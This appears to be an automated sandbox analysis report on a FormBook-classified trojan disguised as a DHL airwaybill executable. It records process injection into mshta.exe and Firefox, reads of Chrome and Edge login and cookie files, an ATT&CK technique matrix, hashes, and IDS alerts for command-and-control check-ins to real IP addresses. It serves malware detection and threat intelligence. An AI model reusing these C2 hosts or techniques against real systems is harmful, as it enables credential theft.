            Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mshta.exe Thread register set: target process: 1944
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Process created: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
            Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: toceDGfrPzLv.exe, 00000005.00000000.2308564173.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, toceDGfrPzLv.exe, 00000005.00000002.4606162861.0000000001B70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
            Source: toceDGfrPzLv.exe, 00000005.00000000.2308564173.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, toceDGfrPzLv.exe, 00000005.00000002.4606162861.0000000001B70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: toceDGfrPzLv.exe, 00000005.00000000.2308564173.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, toceDGfrPzLv.exe, 00000005.00000002.4606162861.0000000001B70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: toceDGfrPzLv.exe, 00000005.00000000.2308564173.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, toceDGfrPzLv.exe, 00000005.00000002.4606162861.0000000001B70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Queries volume information: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe VolumeInformation
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match File source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            [Behavior graph. ID: 1505412; Sample: DHL airwaybill # 6913321715...; Startdate: 06/09/2024; Architecture: WINDOWS; Score: 100. Process chain: DHL airwaybill # 6913321715 & BL Draft copy.exe (started) -> DHL airwaybill # 6913321715 & BL Draft copy.exe (started) -> toceDGfrPzLv.exe (injected) -> mshta.exe (started) -> firefox.exe (started)]

            Source | Detection | Scanner | Label | Link
            DHL airwaybill # 6913321715 & BL Draft copy.exe | 61% | ReversingLabs | Win32.Trojan.Leonem |
            DHL airwaybill # 6913321715 & BL Draft copy.exe | 53% | Virustotal | | Browse
            DHL airwaybill # 6913321715 & BL Draft copy.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1505412
              Start date and time:2024-09-06 09:03:26 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 11m 2s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:11
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:DHL airwaybill # 6913321715 & BL Draft copy.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@7/2@15/12
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 124
              • Number of non-executed functions: 301
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              Time | Type | Description
              03:04:20 | API Interceptor | 1x Sleep call for process: DHL airwaybill # 6913321715 & BL Draft copy.exe modified
              03:05:20 | API Interceptor | 11696730x Sleep call for process: mshta.exe modified
              Process:C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.34331486778365
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
              MD5:1330C80CAAC9A0FB172F202485E9B1E8
              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
              Malicious:true
              Reputation:high, very likely benign file
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
              Process:C:\Windows\SysWOW64\mshta.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
              Category:dropped
              Size (bytes):196608
              Entropy (8bit):1.1239949490932863
              Encrypted:false
              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
              MD5:271D5F995996735B01672CF227C81C17
              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
              Malicious:false
              Reputation:high, very likely benign file
              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.761517328598754
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              • Win32 Executable (generic) a (10002005/4) 49.75%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Windows Screen Saver (13104/52) 0.07%
              • Generic Win/DOS Executable (2004/3) 0.01%
              File name:DHL airwaybill # 6913321715 & BL Draft copy.exe
              File size:776'704 bytes
              MD5:7e3feacbde086188081c1fa2c0891090
              SHA1:c3a3e3d1c8d8d716ce7ce4d2e3a32271d75fdbda
              SHA256:07374ff867cc60e550cbae355fbb87e46eb76fc7cd74ba4005125d1ac3329e52
              SHA512:b298c29d355b2480c386397ab813137358ea231ef6eade981e24caaafa2f63647d216ec2f0868e9d990bec5769e3915ca0783a476925b43e8e3eccff14da32b5
              SSDEEP:12288:kUdmlTiE1brjykN9BFn0AO7YE/OEiR64VP93mG7lRYyAIrjkw0q:9WTt1bfJn0IEiR64D57XYyuw
              TLSH:35F412946648C817CA1852B84EB1F1781BBC6EDDB812E393AFD9ADFFBD66B050D00147
              Icon Hash:5614041456560606
              Entrypoint:0x4be94a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x66D7B323 [Wed Sep 4 01:08:51 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbe8f8 | 0x4f | .text
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc0000 | 0xb9c | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2000 | 0xc | .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbc5ec | 0x54 | .text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x2000 | 0xbc950 | 0xbca00 | a6a8c98c6d797541cfc5f8e864fc674a | False | 0.9116563638999338 | data | 7.771292073435149 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc | 0xc0000 | 0xb9c | 0xc00 | 744a0e235df6a7b49d5ca7b7a8b3b79b | False | 0.4557291666666667 | data | 4.990412533135448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc | 0xc2000 | 0xc | 0x200 | f7d5485cb336ab764b56770ef680649f | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
              RT_ICON | 0xc00c8 | 0x7a0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.5
              RT_GROUP_ICON | 0xc0878 | 0x14 | data | | | 1.05
              RT_VERSION | 0xc089c | 0x2fc | data | | | 0.443717277486911
              DLLImport
              mscoree.dll_CorExeMain
              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
              2024-09-06T09:04:58.073868+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49723 | 3.33.130.190 | 80 | TCP
              2024-09-06T09:04:58.073868+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49723 | 3.33.130.190 | 80 | TCP
              2024-09-06T09:05:13.887462+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49725 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:05:16.457325+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49727 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:05:18.984331+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49728 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:05:21.548286+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49729 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:05:21.548286+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49729 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:05:27.680015+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49731 | 162.240.81.18 | 80 | TCP
              2024-09-06T09:05:30.217391+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49732 | 162.240.81.18 | 80 | TCP
              2024-09-06T09:05:32.775792+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49733 | 162.240.81.18 | 80 | TCP
              2024-09-06T09:05:35.323271+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49734 | 162.240.81.18 | 80 | TCP
              2024-09-06T09:05:35.323271+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49734 | 162.240.81.18 | 80 | TCP
              2024-09-06T09:05:41.648087+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49736 | 192.185.16.209 | 80 | TCP
              2024-09-06T09:05:44.232124+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49737 | 192.185.16.209 | 80 | TCP
              2024-09-06T09:05:46.700782+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49738 | 192.185.16.209 | 80 | TCP
              2024-09-06T09:05:49.332222+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49739 | 192.185.16.209 | 80 | TCP
              2024-09-06T09:05:49.332222+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49739 | 192.185.16.209 | 80 | TCP
              2024-09-06T09:06:00.673507+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49741 | 154.23.184.240 | 80 | TCP
              2024-09-06T09:06:03.167528+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49742 | 154.23.184.240 | 80 | TCP
              2024-09-06T09:06:05.778487+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49743 | 154.23.184.240 | 80 | TCP
              2024-09-06T09:06:08.287501+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49744 | 154.23.184.240 | 80 | TCP
              2024-09-06T09:06:08.287501+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49744 | 154.23.184.240 | 80 | TCP
              2024-09-06T09:06:22.189612+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49745 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:06:24.737470+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49746 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:06:27.323067+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49747 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:06:29.841068+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49748 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:06:29.841068+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49748 | 65.21.196.90 | 80 | TCP
              2024-09-06T09:06:35.510266+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49749 | 184.94.212.115 | 80 | TCP
              2024-09-06T09:06:38.151543+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49750 | 184.94.212.115 | 80 | TCP
              2024-09-06T09:06:40.600160+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49751 | 184.94.212.115 | 80 | TCP
              2024-09-06T09:06:43.148784+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49752 | 184.94.212.115 | 80 | TCP
              2024-09-06T09:06:43.148784+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49752 | 184.94.212.115 | 80 | TCP
              2024-09-06T09:06:49.258887+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49754 | 91.215.85.23 | 80 | TCP
              2024-09-06T09:06:52.613533+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49755 | 91.215.85.23 | 80 | TCP
              2024-09-06T09:06:54.344365+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49756 | 91.215.85.23 | 80 | TCP
              2024-09-06T09:06:56.875392+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49757 | 91.215.85.23 | 80 | TCP
              2024-09-06T09:06:56.875392+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49757 | 91.215.85.23 | 80 | TCP
              2024-09-06T09:07:04.273408+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49758 | 121.199.37.19 | 80 | TCP
              2024-09-06T09:07:06.426978+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49759 | 121.199.37.19 | 80 | TCP
              2024-09-06T09:07:09.026693+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49760 | 121.199.37.19 | 80 | TCP
              2024-09-06T09:07:11.581505+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49761 | 121.199.37.19 | 80 | TCP
              2024-09-06T09:07:11.581505+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49761 | 121.199.37.19 | 80 | TCP
              2024-09-06T09:07:17.619609+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49762 | 188.114.96.3 | 80 | TCP
              2024-09-06T09:07:20.122717+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49763 | 188.114.96.3 | 80 | TCP
              2024-09-06T09:07:22.713243+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49764 | 188.114.96.3 | 80 | TCP
              2024-09-06T09:07:25.218313+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49765 | 188.114.96.3 | 80 | TCP
              2024-09-06T09:07:25.218313+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49765 | 188.114.96.3 | 80 | TCP
              2024-09-06T09:07:30.825610+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49766 | 3.33.130.190 | 80 | TCP
              2024-09-06T09:07:33.381973+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49767 | 3.33.130.190 | 80 | TCP
              2024-09-06T09:07:35.906942+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49768 | 3.33.130.190 | 80 | TCP
              2024-09-06T09:07:39.405725+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49769 | 3.33.130.190 | 80 | TCP
